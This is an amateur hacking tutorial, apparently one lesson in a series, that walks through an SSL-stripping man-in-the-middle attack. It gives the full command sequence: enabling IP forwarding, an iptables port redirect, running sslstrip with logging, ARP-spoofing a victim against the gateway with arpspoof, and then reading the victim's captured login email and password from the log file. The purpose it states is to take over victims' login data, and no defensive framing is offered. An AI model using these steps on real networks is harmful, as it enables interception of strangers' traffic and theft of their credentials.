hacking: 2. SSL data encryption

Hi! On previous lesson I told that we will talk about SSL encryption. Today I will explain what is SSL encryption and how use. After that lesson you will know, how to take over login data victim? We will to take over data for experiment, on explorer browser today, because I would like to show you only how this is working, this is not work on browsers example google chrome or mozilla firefox, so move to action!

If we would like to take over SSL data encryption, we have to use SSLStrip program, is another way to take over data encryption atack type MITM(man in the middle), but we won’t use that, because it warning user from dangerous connection, so is less effective. SSLStrip program which we will use changing only beginning url address from https on http, so this is technicaly inperceptible for user.

So you enbale terminal in kali linuks and enter command echo 1 > /proc/sys/net/ipv4/ip_forward that command I described in lesson about ARP spoofing if you don’t know that command check previous lesson.

Next in terminal you have to enter command iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 that command tell firewall iptables which will to cause forwarding movement from port 80 to SSLStrip program. If you would like to know which number IP address has your network gateway, enter route -n, except IP address there are also others parameters.

Now you have to enable SSLStrip program and save data to file preview.txt line sslstrip -l 8080 -f -w preview.txt

Before we will to capture encryption data we have to stitch up under network gateway, run new terminal, but don’t close previous and enter arpspoof -i eth0 -t ip victim ip networkgateway in my case was -i eth0 -t 192.168.1.199 192.168.1.1

Now enable ours loved browser explorer on go to facebook, you should see that address with begining http.

If victim going to sign in now and you would like to see her address and password enter command in new terminal cat preview.txt.